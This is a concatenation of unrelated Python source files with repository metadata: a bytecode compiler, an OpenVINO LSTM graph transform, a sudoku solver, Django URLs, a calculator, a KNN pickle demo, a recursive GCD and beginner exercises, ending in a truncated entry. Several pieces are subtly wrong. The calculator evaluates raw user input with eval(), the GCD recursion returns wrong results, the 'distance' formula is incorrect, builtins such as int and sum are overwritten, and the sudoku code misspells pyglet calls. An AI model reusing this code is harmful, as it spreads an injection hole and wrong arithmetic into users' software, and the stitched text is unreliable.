refs/heads/master
2023-05-29T02:07:07.861324
2021-06-17T10:11:27
2021-06-17T10:11:27
377,801,143
0
0
null
null
null
null
UTF-8
Python
false
false
1,246
py
from abc import ABC, abstractmethod class Compilable(ABC): def __init__(self, value) -> None: self.value = value def __repr__(self) -> str: return f"<{self.__class__.__qualname__} value={self.value}>" def __str__(self) -> str: return self.__repr__() @abstractmethod def compile(self) -> bytearray: ... class Raw(Compilable): def compile(self) -> bytearray: return bytearray([self.value]) class Integer(Compilable): def compile(self) -> bytearray: b = bytearray([0xF0]) b.extend(self.value.to_bytes(8, "big")) return b class String(Compilable): def compile(self) -> bytearray: b = bytearray([0xF1]) b.extend(Integer(len(self.value)).compile()) b.extend([ord(c) for c in self.value]) return b class DebugInfo(Compilable): def __init__(self, file: str, line: int) -> None: self.value = f"{line}@{file}" def compile(self) -> bytearray: b = bytearray([0xFF]) b.extend(String(self.value).compile()) return b class Identifier(Compilable): def compile(self) -> bytearray: b = bytearray([0xF4]) b.extend(String(self.value).compile()) return b
[ "vcokltfre@gmail.com" ]
vcokltfre@gmail.com
145dc99e4e6ead5edb4254afe7e15b60d4ae21ef
088e000eb5f16e6d0d56c19833b37de4e67d1097
/model-optimizer/extensions/front/kaldi/replace_lstm_nonlinearity.py
f50def886315e73b6d88ba0cc490d3cb0843896b
[ "Apache-2.0" ]
permissive
projectceladon/dldt
614ba719a428cbb46d64ab8d1e845ac25e85a53e
ba6e22b1b5ee4cbefcc30e8d9493cddb0bb3dfdf
refs/heads/2019
2022-11-24T10:22:34.693033
2019-08-09T16:02:42
2019-08-09T16:02:42
204,383,002
1
1
Apache-2.0
2022-11-22T04:06:09
2019-08-26T02:48:52
C++
UTF-8
Python
false
false
5,493
py
""" Copyright (c) 2019 Intel Corporation Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from extensions.ops.activation_ops import Sigmoid, Tanh from mo.front.caffe.extractors.utils import embed_input from mo.front.common.replacement import FrontReplacementOp from mo.graph.graph import Node, Graph from mo.ops.concat import Concat from mo.ops.eltwise import Eltwise from mo.ops.scale_shift import ScaleShiftOp from mo.ops.split import Split class ReplaceLstmNonLinearityPattern(FrontReplacementOp): op = "LstmNonLinearity" enabled = True def run_after(self): from extensions.front.restore_ports import RestorePorts return [RestorePorts] def replace_op(self, graph: Graph, node: Node): # split input to (i_part, f_part, c_part, o_part, ct_1) split_node = Split(graph, {'name': graph.unique_id(prefix='Split_lstm_input_'), 'num_split': 5}).create_node() node.in_port(0).get_connection().set_destination(split_node.in_port(0)) for i in range(5): split_node.add_output_port(i) # i_t = Sigmoid(i_part + w_ic*ct_1) i_scale_attrs = {'name': graph.unique_id(prefix='i_scaleshift'), 'bias_term': False} embed_input(i_scale_attrs, 1, 'weights', node.i_weights) i_scale = ScaleShiftOp(graph, i_scale_attrs).create_node() split_node.out_port(4).connect(i_scale.in_port(0)) sum_i_c = Eltwise(graph, {'name': graph.unique_id(prefix='sum_i_c_'), 'operation': 'sum'}).create_node() split_node.out_port(0).connect(sum_i_c.in_port(0)) i_scale.out_port(0).connect(sum_i_c.in_port(1)) i_sigmoid = Sigmoid(graph, {'name': 
'i_sigmoid'}).create_node() sum_i_c.out_port(0).connect(i_sigmoid.in_port(0)) # f_t = Sigmoid(f_part + w_fc*ct_1) f_scale_attrs = {'name': graph.unique_id(prefix='f_scaleshift'), 'bias_term': False} embed_input(f_scale_attrs, 1, 'weights', node.f_weights) f_scale = ScaleShiftOp(graph, f_scale_attrs).create_node() split_node.out_port(4).connect(f_scale.in_port(0)) sum_f_c = Eltwise(graph, {'name': graph.unique_id(prefix='sum_f_c_'), 'operation': 'sum'}).create_node() split_node.out_port(1).connect(sum_f_c.in_port(0)) f_scale.out_port(0).connect(sum_f_c.in_port(1)) f_sigmoid = Sigmoid(graph, {'name': 'f_sigmoid'}).create_node() sum_f_c.out_port(0).connect(f_sigmoid.in_port(0)) # c_t = f_t*ct_1 + i_t * tanh(c_part) c_tanh = Tanh(graph, {'name': 'c_tanh'}).create_node() split_node.out_port(2).connect(c_tanh.in_port(0)) prod_i_c_tanh = Eltwise(graph, {'name': graph.unique_id(prefix='prod_i_c_tanh_'), 'operation': 'mul'}).create_node() i_sigmoid.out_port(0).connect(prod_i_c_tanh.in_port(0)) c_tanh.out_port(0).connect(prod_i_c_tanh.in_port(1)) prod_f_ct_1 = Eltwise(graph, {'name': graph.unique_id(prefix='prod_f_ct_1_'), 'operation': 'mul'}).create_node() f_sigmoid.out_port(0).connect(prod_f_ct_1.in_port(0)) split_node.out_port(4).connect(prod_f_ct_1.in_port(1)) sum_f_i = Eltwise(graph, {'name': graph.unique_id(prefix='sum_f_i_'), 'operation': 'sum'}).create_node() prod_f_ct_1.out_port(0).connect(sum_f_i.in_port(0)) prod_i_c_tanh.out_port(0).connect(sum_f_i.in_port(1)) # o_t = Sigmoid(o_part + w_oc*c_t) o_scale_attrs = {'name': graph.unique_id(prefix='o_scaleshift'), 'bias_term': False} embed_input(o_scale_attrs, 1, 'weights', node.o_weights) o_scale = ScaleShiftOp(graph, o_scale_attrs).create_node() sum_f_i.out_port(0).connect(o_scale.in_port(0)) sum_o_c = Eltwise(graph, {'name': graph.unique_id(prefix='sum_o_c_'), 'operation': 'sum'}).create_node() split_node.out_port(3).connect(sum_o_c.in_port(0)) o_scale.out_port(0).connect(sum_o_c.in_port(1)) o_sigmoid = 
Sigmoid(graph, {'name': 'o_sigmoid'}).create_node() sum_o_c.out_port(0).connect(o_sigmoid.in_port(0)) # m_t = o_t * Tanh(c_t) c_t_tanh = Tanh(graph, {'name': 'c_t_tanh'}).create_node() sum_f_i.out_port(0).connect(c_t_tanh.in_port(0)) prod_o_c_t_tanh = Eltwise(graph, {'name': graph.unique_id(prefix='prod_o_c_t_tanh_'), 'operation': 'mul'}).create_node() o_sigmoid.out_port(0).connect(prod_o_c_t_tanh.in_port(0)) c_t_tanh.out_port(0).connect(prod_o_c_t_tanh.in_port(1)) # add concat to create 1 output concat = Concat(graph, {'name': graph.unique_id(prefix='Concat_c_m')}).create_node() concat.add_sequence_of_ports('in', range(2)) sum_f_i.out_port(0).connect(concat.in_port(0)) prod_o_c_t_tanh.out_port(0).connect(concat.in_port(1)) return [concat.id]
[ "44090433+openvino-pushbot@users.noreply.github.com" ]
44090433+openvino-pushbot@users.noreply.github.com
bc31f0d3373dece3426e10a21d2ea098049e4f14
c9fb37a97abe7767e45e2d95694002aa334da6a1
/kodetest/__init__.py
cefda69719b8c2e0658c4bbc64e84368abc0119b
[ "MIT" ]
permissive
arve0/kodetest
6c3ce09e3afbb29e54bac4d9bbc7c0963bd13dd5
93a6c5ca4d50c5574f0d3bda94c7aba9da38430a
refs/heads/master
2021-01-21T10:09:22.152122
2015-06-10T10:23:24
2015-06-10T10:23:24
37,190,492
0
0
null
null
null
null
UTF-8
Python
false
false
169
py
__author__ = 'Arve Seljebu' __email__ = 'arve.seljebu@gmail.com' from os.path import join, dirname __version__ = open(join(dirname(__file__), 'VERSION')).read().strip()
[ "arve.seljebu@gmail.com" ]
arve.seljebu@gmail.com
c37555e64f17e0c4712b0d716cd059dc7849bdf4
b7125b27e564d2cc80a2ce8d0a6f934aa22c8445
/.history/sudoku_20201029173225.py
f1d02d60237cac3cf3e062856f9ae2188ea2cd11
[]
no_license
JensVL96/Puzzle-solver-for-fun
4c15dcd570c3705b7ac555efb56b52913e81083c
6d8a4378a480372213a596a336a4deca727a00fc
refs/heads/master
2021-07-15T05:19:42.185495
2020-11-08T13:59:49
2020-11-08T13:59:49
224,855,888
1
0
null
null
null
null
UTF-8
Python
false
false
6,919
py
# -*- coding: utf-8 -*- from __future__ import print_function import pygame as pg from random import sample from pyglet.gl import * from string import * import numpy as np class create_board(): def __init__(self): self.base = 3 # Will generate any size of random sudoku board in O(n^2) time self.side = self.base * self.base self.nums = sample(range(1, self.side + 1), self.side) # random numbers self.board = [[self.nums[(self.base * (r%self.base) + r//self.base + c)%self.side] for c in range(self.side) ] for r in range(self.side)] rows = [ r for g in sample(range(self.base),self.base) for r in sample(range(g * self.base,(g + 1) * self.base), self.base) ] cols = [ c for g in sample(range(self.base),self.base) for c in sample(range(g * self.base,(g + 1) * self.base), self.base) ] self.board = [[self.board[r][c] for c in cols] for r in rows] # print("\nInput:") # for line in self.board: print(line) squares = self.side * self.side empties = squares * 3//4 for p in sample(range(squares),empties): self.board[p//self.side][p%self.side] = 0 self.lines() def expandLine(self, line): return line[0]+line[5:9].join([line[1:5]*(self.base-1)]*self.base)+line[9:13] def lines(self): self.line0 = self.expandLine("╔═══╤═══╦═══╗") self.line1 = self.expandLine("║ . │ . ║ . 
║") self.line2 = self.expandLine("╟───┼───╫───╢") self.line3 = self.expandLine("╠═══╪═══╬═══╣") self.line4 = self.expandLine("╚═══╧═══╩═══╝") self.draw() def draw(self): symbol = " 1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ" self.nums = [ [""]+[symbol[n] for n in row] for row in self.board ] print(self.line0) for r in range(1,self.side+1): print( "".join(n+s for n,s in zip(self.nums[r-1],self.line1.split("."))) ) print([self.line2,self.line3,self.line4][(r%self.side==0)+(r%self.base==0)]) class solve_board(): def __init__(self, board): self.row = [] self.col = [] self.cell = [] self.row_list = [] self.col_list = [] self.cell_list = [] for space in range(9): self.col.append([]) self.cell.append([]) row_idx = 0 for line in board: self.row.append(line) cell_idx = 0 if row_idx >= 3: cell_idx = 3 if row_idx >= 6: cell_idx = 6 for col_idx in range(9): self.col[col_idx].insert(row_idx, line[col_idx]) if col_idx % 3 == 0: for triple in range(0, 3): self.cell[cell_idx].insert(len(self.cell[row_idx]) + triple, line[col_idx + triple]) cell_idx += 1 self.row_list.append(self.row) self.col_list.append(self.col) self.cell_list.append(self.cell) row_idx += 1 print("\nrow:") for row in self.row_list[0]: print(row) # print("\ncolumn:") # for col in self.col_list[0]: # print(col) # print("\ncell:") # for cell in self.cell_list[0]: # print(cell) def assign_flags(self, board): self.flags = [] row_idx = 0 cell_idx = 0 print("\n") for line in board: cell_idx = 0 if row_idx >= 3: cell_idx = 3 if row_idx >= 6: cell_idx = 6 for index in range(9): # print("position: ", index, "value: ", line[index]) # print("row", row_idx, "col", index, "cell", cell_idx) if (index % 3 == 0 and index != 0): cell_idx += 1 if line[index] == 0: flag_idx = 0 temp_flag = [] for value in range(1, 10): # print(value) if self.row_flag(value, row_idx): # print("found in row") pass elif self.col_flag(value, index): # print("found in column") pass elif self.cell_flag(value, cell_idx): # print("found in cell") pass else: 
temp_flag.append(value) flag_idx += 1 print(temp_flag) self.flags.append(temp_flag) row_idx += 1 def check_row(self): pass def column(self, x): pass def cell(self, row, col): pass def row_flag(self, index, row_idx): for row in self.row_list[0][row_idx]: # print("comparing in row ", row, "with ", index, "row_idx ", row_idx) if row == index: return 1 return 0 def col_flag(self, index, col_idx): for col in self.col_list[0][col_idx]: # print("comparing in column ", col, "with ", index, "col_idx ", col_idx) if col == index: return 1 return 0 def cell_flag(self, index, cell_idx): for cell in self.cell_list[0][cell_idx]: # print("comparing in cell ", cell, "with ", index, "cell_idx ", cell_idx) if cell == index: return 1 return 0 class Display_board(pyglet.window.Window): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # Set window size self.set_minimum_size(700,700) # Set background color background_color = [255, 255, 255, 255] background_color = [i / 255 for i in background_color] gClearColor(*background_color) def on_key_press(self, symbol, modifier): pass def on_key_release(self, symbol, modifier): pass def on_mouse_press(self, symbol, modifier): pass def on_draw(self, symbol, modifier): pass def update(self, symbol, modifier): pass # Start the main window and start a timer to hit the update method frame_rate = 30 class Main(): def __init__(self): self.board = [] self.run() def run(self): self.board = create_board().board self.solution = solve_board(self.board) self.solution.assign_flags(self.board) if __name__ == '__main__': window = Display_board(700, 700, "sudoku", resizeable=False) pyglet.clock.schedule_interval(window.update, 2/ frame_rate) pyglet.app.run() Main()
[ "jle040@uit.no" ]
jle040@uit.no
a5b8f8016a604a139731ae6089707b51448c5508
5d505823a5640ee6dce32183cac76dd48211702a
/apps/permissions/urls.py
76bb2af84e33894bade640b9a66170ca542cbfba
[]
no_license
strogo/mayan
0e1ead8c1b14d2f9d3f070373a57e2614579bc2a
cdff873400f9487ea8ed770d47df343a89835008
refs/heads/master
2020-04-06T06:53:24.301196
2011-03-12T09:06:25
2011-03-12T09:06:25
null
0
0
null
null
null
null
UTF-8
Python
false
false
829
py
from django.conf.urls.defaults import * urlpatterns = patterns('permissions.views', url(r'^role/list/$', 'role_list', (), 'role_list'), url(r'^role/create/$', 'role_create', (), 'role_create'), url(r'^role/(?P<role_id>\d+)/permissions/$', 'role_permissions', (), 'role_permissions'), url(r'^role/(?P<role_id>\d+)/edit/$', 'role_edit', (), 'role_edit'), url(r'^role/(?P<role_id>\d+)/delete/$', 'role_delete', (), 'role_delete'), url(r'^permission/(?P<permission_id>\d+)/for/(?P<app_label>[\w\-]+)/(?P<module_name>[\w\-]+)/(?P<pk>\d+)/grant/$', 'permission_grant_revoke', {'action':'grant'}, 'permission_grant'), url(r'^permission/(?P<permission_id>\d+)/for/(?P<app_label>[\w\-]+)/(?P<module_name>[\w\-]+)/(?P<pk>\d+)/revoke/$', 'permission_grant_revoke', {'action':'revoke'}, 'permission_revoke'), )
[ "Roberto.Rosario.Gonzalez@gmail.com" ]
Roberto.Rosario.Gonzalez@gmail.com
85bbae3ed6f3bfb50670f9375b6cb5cb8b856f19
cf5ceed90310006a4543d976882c85bc701efab3
/crawley/manager/commands/__init__.py
895d50c9e43e6ddd6cb692746b327145556a5241
[]
no_license
hammadk373/crawley
698b1aff51267a78f5e9f18d78f43e1dd69d75bd
f7522cfa0446b523b93e8056991f9d10e9754ff0
refs/heads/master
2021-01-18T06:52:07.753729
2011-10-28T02:37:00
2011-10-28T02:37:00
2,663,083
1
0
null
null
null
null
UTF-8
Python
false
false
774
py
""" All Crawley's commands must be here """ from crawley.manager.utils import exit_with_error from run import RunCommand from shell import ShellCommand from startproject import StartProjectCommand from syncdb import SyncDbCommand from browser import BrowserCommand class CommandsDict(dict): def __getitem__(self, key): if key in self: return dict.__getitem__(self, key) else: exit_with_error("[%s] Subcommand not valid" % (key)) commands = CommandsDict() d = { RunCommand.name : RunCommand, ShellCommand.name : ShellCommand, StartProjectCommand.name : StartProjectCommand, SyncDbCommand.name : SyncDbCommand, BrowserCommand.name : BrowserCommand, } commands.update(d)
[ "jmg.utn@gmail.com" ]
jmg.utn@gmail.com
e75a8b7eb62b91249a6c1ed047fdc38e0466edde
800a14e246e19308445eaec2456282361819a763
/05-Functions.py
a698f3fec295f43f0c439d19719166dbfc3152b7
[]
no_license
anmolrajaroraa/CorePythonMarch
76d6ae5ace773e3406ae637e715240dbef09cfe1
0f693270bdd5f21e1401d0515574945a6004fecd
refs/heads/master
2021-03-15T02:29:52.818197
2020-04-26T10:06:23
2020-04-26T10:06:23
246,817,221
0
1
null
null
null
null
UTF-8
Python
false
false
464
py
# Console calculator: read two numbers and apply the operator chosen
# from a menu.
import operator


# Maps an operator symbol to a safe arithmetic function.  The original
# code concatenated raw user input into a string and ran eval() on it,
# which executes arbitrary Python typed at the prompt (security hole);
# explicit dispatch removes that while producing the same results for
# numeric input.
OPERATIONS = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    "/": operator.truediv,
}


def to_number(text):
    """Parse user input as int when possible, else float (mirrors eval on numeric literals)."""
    try:
        return int(text)
    except ValueError:
        return float(text)


def takeInput():
    """Prompt for the two operands and return them as entered (strings)."""
    first_num = input("Enter first number : ")
    second_num = input("Enter second number : ")
    return first_num, second_num


def calculate(operator):
    """Read two numbers and print the result of applying `operator` ("+", "-", "*", "/")."""
    x, y = takeInput()
    print(OPERATIONS[operator](to_number(x), to_number(y)))


# Guarded so importing this module (e.g. from tests) does not block on input().
if __name__ == "__main__":
    print('''
    1. Add
    2. Subtract
    3. Multiply
    4. Divide
    ''')
    choice = int(input("Enter your choice : "))
    operators = {
        1: "+",
        2: "-",
        3: "*",
        4: "/"
    }
    calculate(operators[choice])
[ "anmolarora1711@gmail.com" ]
anmolarora1711@gmail.com
87f99d6fbc4b1f65292544a6604083619ffac402
8f8e378c0ce4224244582c506c268edda3cc3b30
/Common/ML/Day11/k.py
7cd68c168a9b23db33a99fb633074bc7b9ee6f5f
[]
no_license
srsapireddy/Diploma-in-AI_NIELIT_Files
223318319b2d4b8647d77b99d1ba03f0d6e15cf6
9e2ed78fbe03369ebef1aa81f3417fc21bdd4107
refs/heads/master
2021-05-17T14:28:00.059617
2020-03-29T09:28:04
2020-03-29T09:28:04
250,820,401
0
0
null
null
null
null
UTF-8
Python
false
false
338
py
# Train a KNN classifier on the iris dataset, persist it with pickle,
# reload it from disk, and run one prediction to confirm the round trip.
from sklearn.datasets import load_iris
from sklearn.neighbors import KNeighborsClassifier
iris=load_iris()
import pickle
X=iris.data
y=iris.target
knn=KNeighborsClassifier()
knn1=KNeighborsClassifier()  # placeholder; overwritten by the unpickled model below
knn.fit(X,y)
file='k1'  # model file written to the current working directory
pickle.dump(knn,open(file,'wb'))
knn1=pickle.load(open(file,'rb'))
# Predict the class for one sample (4 iris feature values).
p=knn1.predict([[3,2,2,1]])
print(p)
[ "sapireddyrahul@gmail.com" ]
sapireddyrahul@gmail.com
f393981cecf624006b404116a11be34f4cd139cf
51108a50ffb48ad154f587c230045bb783f22240
/bflib/units/__init__.py
036f8f8be95c9ed68fe6f955023f6bcf26da6861
[ "MIT" ]
permissive
ChrisLR/BasicDungeonRL
c90bd0866c457557cccbad24e14689d5d6db7b00
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
refs/heads/master
2021-06-15T13:56:53.888646
2019-08-05T16:33:57
2019-08-05T16:33:57
104,269,987
3
0
MIT
2019-08-05T16:28:23
2017-09-20T21:35:19
Python
UTF-8
Python
false
false
247
py
from bflib.units.distance import Feet from bflib.units.mass import Pound from bflib.units.speed import FeetPerGameTurn from bflib.units.time import CombatRound, GameTurn, Minute, Second, Year, Hour from bflib.units.volume import CubicFeet, Litre
[ "arzhul@gmail.com" ]
arzhul@gmail.com
c319f7eb6adadc8d4b605cc1e85628addfd71945
71dc727f9056934cd51692f8a3d26cf0dda44ef0
/code/Chapter-12/gcd.py
d6cb90c851bef0ce5b925ec84a6df6e159789188
[ "MIT" ]
permissive
justinclark-dev/CSC110
9d255020a50bbfdb195465c3e742dd2fcd61e3a4
d738ec33b757ba8fa9cf35b2214c184d532367a0
refs/heads/master
2022-12-08T08:08:30.667241
2020-09-04T01:05:34
2020-09-04T01:05:34
232,606,910
0
1
MIT
2020-09-04T02:05:47
2020-01-08T16:28:37
Python
UTF-8
Python
false
false
512
py
# This program uses recursion to find the GCD
# of two numbers.

def main():
    """Prompt for two integers and print their greatest common divisor."""
    # Get two numbers.
    num1 = int(input('Enter an integer: '))
    num2 = int(input('Enter another integer: '))

    # Display the GCD.
    print('The greatest common divisor of')
    print('the two numbers is', gcd(num1, num2))

# The gcd function returns the greatest common
# divisor of two numbers.
def gcd(x, y):
    """Return the GCD of x and y via Euclid's algorithm (y must be nonzero)."""
    if x % y == 0:
        return y
    else:
        # BUG FIX: recurse on (y, x % y), not (x, x % y).  The old call
        # returned x itself whenever x < y — e.g. gcd(4, 6) gave 4
        # instead of 2 — because x % y == x in that case.
        return gcd(y, x % y)

# Call main only when run as a script, so importing this module
# (e.g. from tests) does not block on input().
if __name__ == '__main__':
    main()
[ "justinclark.dev@gmail.com" ]
justinclark.dev@gmail.com
fb78d2f8093b498f88e87fba3b9afa1bad9ba6e7
aad51b0ea59c38b23ed419e10b86c44aa947f117
/288/smallest.py
7003266b991249449227815267c7b365aaac4b8f
[]
no_license
berubejd/PyBites
3a1d7144f59f67a0996dbe224b69bc0b6da439d6
439446e8b67612a603713723b2d4a021677341d2
refs/heads/master
2021-07-14T14:03:51.819347
2020-11-01T14:59:02
2020-11-01T14:59:02
221,087,519
0
0
null
null
null
null
UTF-8
Python
false
false
522
py
#!/usr/bin/env python3.8
"""
Bite 288. Smallest number ☆

Write a function that accepts a list of digits and returns the smallest
number that can be created by combining unique digits — duplicated
digits are ignored.

Examples:
[1] => 1
[7, 1] => 17
[1, 9, 5, 9, 1] => 159

Note: An empty input list [] should return 0.
"""
from typing import List


def minimum_number(digits: List[int]) -> int:
    """Join the unique digits in ascending order into one int; 0 for no digits."""
    if not digits:
        return 0
    unique_ascending = sorted(set(digits))
    return int("".join(map(str, unique_ascending)))
[ "berubejd@gmail.com" ]
berubejd@gmail.com
210332a8e477a11cd9d18fa27771e44c7d8b322b
3fd8fd35d61d997b586e40ed8d938805ce5fdf3b
/unique_ingredients_generator.py
cf09203c8b44b54f8131bbe5e3d2071ef90ee998
[]
no_license
ChocolatePadmanaban/Cooking_Scheduler
8afd967cd5128b15c9865aa44ae3d298ee3027ad
3cd91009e68064f92408fb5bba55519ba77767c3
refs/heads/master
2023-01-03T10:55:25.306425
2020-11-01T07:13:50
2020-11-01T07:13:50
260,551,843
0
0
null
null
null
null
UTF-8
Python
false
false
849
py
# Scan every CSV under recipe_ingredients/ and collect each distinct
# ingredient name (column 0) with its associated value (column 2),
# then print them sorted for manual review/de-duplication.
import csv
import os

ingredient_files=os.listdir("recipe_ingredients")
ingredient_dict={}

for ingredient_file in ingredient_files:
    i_file = open('recipe_ingredients/'+ingredient_file)
    csv_i_file = csv.reader(i_file)
    for row in csv_i_file:
        # Skip header-style rows.
        if row[0] not in ['name', 'question']:
            # Ingredient already seen with a different value: keep every
            # variant in a list.
            if row[0] in ingredient_dict.keys() and row[2] != ingredient_dict[row[0]]:
                if type(ingredient_dict[row[0]]) == type([]):
                    # NOTE(review): once the stored value is a list, the
                    # ``row[2] != <list>`` comparison above is always
                    # true, so duplicate variants can be appended —
                    # confirm whether that is intended.
                    ingredient_dict[row[0]].append(row[2])
                else:
                    ingredient_dict[row[0]]=[ingredient_dict[row[0]],row[2]]
            else:
                ingredient_dict[row[0]]=row[2]
    i_file.close()

row_format ="{:<20}" *2
for key in sorted(ingredient_dict):
    #print( row_format.format(key, ingredient_dict[key]))
    print( key, ingredient_dict[key])
[ "pradeeppadmanaban7@gmail.com" ]
pradeeppadmanaban7@gmail.com
877564edfc0d7dbde701ac67bc6a543797ef45e0
409ea8d82e5cc160028456755f9b36fd74da6258
/AI 서비스를 위한 프로그래밍 기본/test0720.py
da63291344c0bbd1f90e4385dbdb3f7b83c74619
[]
no_license
ineed-coffee/multicampus-AI-engineering
55c241c8367d099a62595032f4496f10662446f1
5dd9f6dd97910de73103235b33a5d500c205237a
refs/heads/master
2023-01-19T21:37:59.192972
2020-11-30T09:54:49
2020-11-30T09:54:49
279,185,082
1
0
null
null
null
null
UTF-8
Python
false
false
654
py
# # review # # private instance variable # class person(): # def __init__(self,name,age): # self.__name = name # self.__age = age # def show_name(self): # return self.__name # def show_age(self): # return self.__age # # inheritance # class student(): # def study(self): # print('Student studying') # class mid_student(): # def study(self): # print('Middle student studying') # #-------------------------------------------------------- # from mypackage import functions # Command = functions.sum # print(Command(1,2)) import os print(os.path.exists('user.txt'))
[ "leey93ssu@gmail.com" ]
leey93ssu@gmail.com
220baaf2058130c0aee5967ca7d27910c3f5723e
b5f249c6ede64809cce1c622d1da536de7a88ce8
/test/unit/constants.py
a7b9246c0ba63cc2d6a6abf6fe58a3b5cae50c09
[]
no_license
rimms/jubatest
89a554d2361ef3095f920a92c5d89fe2fdb646e5
e4d66ceccfdeecdb91ba3d216c227773b70a7fe1
refs/heads/master
2020-12-25T09:47:16.812398
2015-03-12T10:47:31
2015-03-12T10:47:31
13,459,176
0
0
null
null
null
null
UTF-8
Python
false
false
806
py
# -*- coding: utf-8 -*- import time from jubatest import * from jubatest.unit import JubaTestFixtureFailedError class DefaultConfigTest(JubaTestCase): def test_sleep(self): begin = time.time() sleep(1) # from jubatest.constants timeTaken = time.time() - begin self.assertAlmostEqual(1.0, timeTaken, places=2) def test_default_config_classifier_immutable(self): cfg1 = default_config(CLASSIFIER) cfg1['method'] = 'none' cfg2 = default_config(CLASSIFIER) self.assertNotEqual(cfg1['method'], cfg2['method']) def test_default_config_recommender(self): self.assertIsNotNone(default_config(RECOMMENDER)) def test_default_config_fail(self): self.assertRaises(JubaTestFixtureFailedError, default_config, 'fail')
[ "webmaster@kenichimaehashi.com" ]
webmaster@kenichimaehashi.com
6b37f3ed770bca9d9f491eb1028f94922a775476
c7ce0a7bbefa817877ae02d0497a8ee138ee460d
/app/migrations/0002_work.py
f3c5c9bfad5d20168b49d0605cfad93cfb4c907b
[]
no_license
hiroshi-higashiyama/DJANGO-PORTFOLIO
288cfcb0eefc375b643556d0ab63e05acc0646c6
1e66ed9355fc00cd8228b3bcac40a8f6c75b6451
refs/heads/master
2022-12-03T20:24:39.109925
2020-08-21T13:26:44
2020-08-21T13:26:44
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,087
py
# Generated by Django 3.1 on 2020-08-16 10:02 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app', '0001_initial'), ] operations = [ migrations.CreateModel( name='Work', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=100, verbose_name='タイトル')), ('image', models.ImageField(upload_to='images', verbose_name='イメージ画像')), ('thumbnail', models.ImageField(blank=True, null=True, upload_to='images', verbose_name='サムネイル')), ('skill', models.CharField(max_length=100, verbose_name='スキル')), ('url', models.CharField(blank=True, max_length=100, null=True, verbose_name='URL')), ('created', models.DateField(verbose_name='作成日')), ('description', models.TextField(verbose_name='説明')), ], ), ]
[ "s20840011@gmail.com" ]
s20840011@gmail.com
85e2f1127c455858f263e129968012d3d12350e4
bc6508a1dde1e61a8b2f61e70044c074aeeb4406
/whoiser/servers/UA.py
c9752e72fe6d9a86e91af5187e8fc2b9203b5cd5
[]
no_license
krikulis/whoiser
7eca72260dc061a91c7630901557264b80c5263e
27af46d6ffcf2bacc5e5b837883ab5fab7ac9b40
refs/heads/master
2021-01-10T19:10:53.915622
2012-06-24T23:50:28
2012-06-24T23:50:28
null
0
0
null
null
null
null
UTF-8
Python
false
false
200
py
#TODO: write implementation from servers.generic import GenericWhoisQuery class WhoisQuery(GenericWhoisQuery): server = 'whois.ua' def parse_response(self, response): return response
[ "kristaps.kulis@gmail.com" ]
kristaps.kulis@gmail.com
8f1b383ecc9e8d14ee9afc1d8a5cf57fe674970f
d1da1bfc310cb428152a9d4e41509b08ee4a6846
/python4.py
bf6430f3830af7492994d5b1cbf235ff9b2d8815
[]
no_license
imrajashish/python
3c9c3a2b3cdd939741fc062ca52df6e3a40d5a45
898032f9acb707e0cb0ad40b6b6f2a2406610893
refs/heads/master
2022-12-07T12:07:08.500570
2020-09-04T15:21:26
2020-09-04T15:21:26
283,292,211
1
0
null
null
null
null
UTF-8
Python
false
false
1,867
py
#Write a Python program to solve (x + y) * (x + y). x = 4 y = 5 s = (x + y) * (x + y) print("output is : ",s) #Write a Python program to add two objects if both objects are an integer type. x = int(input("Enter the a : ")) y = int(input("Enter the b : ")) sum = x+y print("sum of two number is : ",sum) # Write a Python program to display your details like name, age, address in three different lines def personal_details(): name , age = "Ashish",21 address = "Bangalore, Karnataka, India" print("Name: {}\nAge: {}\nAddress: {}".format(name, age, address)) personal_details() #Write a Python program to compute the future value of a specified principal amount, rate of interest, and a number of years. amt = 10000 int = 3.5 years = 7 future_value = amt*((1+(0.01*int)) ** years) print(round(future_value,2)) #remark #Write a Python program to compute the distance between the points (x1, y1) and (x2, y2). x1 = float(input("Enter the number x1 is :")) x2 = float(input("Enter the number x2 is :")) y1 = float(input("Enter the number y1 is :")) y2 = float(input("Enter the number y2 is :")) distance = (x1-x2)*(y1-y2) print("distance between the points is : ",distance) #Write a Python program to sum of two given integers. However, if the sum is between 15 to 20 it will return 20. def sum(x,y): sum = x+y if sum in range(15,20): return 20 else: return sum print(sum(10,6)) #Write a Python program that will return true if the two given integer values are equal or their sum or difference is 5 def sum(x,y): if x == y or abs(x+y) == 5 or x-y == 5: return True #remark else: return False print(sum(7,2)) print(sum(3, 2)) print(sum(2, 2)) #Write a Python program to check whether a file exists. import os.path open('abc.txt', 'w') print(os.path.isfile('abc.txt')) #remark w
[ "imrajashish07@gmail.com" ]
imrajashish07@gmail.com
1620054aa845a8b00ec4d9c3c6f27667467d29a6
d9a5600b3b211993dedd4225dfd77ff7daa1384e
/src/tweets/admin.py
d958f478fa09fdd00c0e0eb02be9ccd5aae9bbd1
[]
no_license
Ahmedsebit/django_twitter_like_app
220da09fd471c1e5a28070f9af587b3d23aafe78
d1abb08da75928a97761830faaca2fd32fbe3e31
refs/heads/master
2020-12-02T23:57:26.744081
2017-07-12T12:16:38
2017-07-12T12:16:38
95,966,074
0
0
null
null
null
null
UTF-8
Python
false
false
276
py
from django.contrib import admin # Register your models here. from .forms import TweetModelForm from .models import Tweet class TweetModelAdmin(admin.ModelAdmin): # form = TweetModelForm class Meta: model = Tweet admin.site.register(Tweet, TweetModelAdmin)
[ "Ahmed.yusuf@andela.com" ]
Ahmed.yusuf@andela.com
242fcb76e5732df2b210443389ce6cf555f2bfd3
57cb9fef5efac78758f5d151b959ca2216c94083
/edx/app/discovery/venvs/discovery/bin/cq
11d127b143483c4edd18ed18708a09cbf20e1286
[]
no_license
JosiahKennedy/openedx-branded
9751d5362088276a87b2e0edca0913568eeb1ac4
d16a25b035b2e810b8ab2b0a2ac032b216562e26
refs/heads/master
2022-12-21T02:39:17.133147
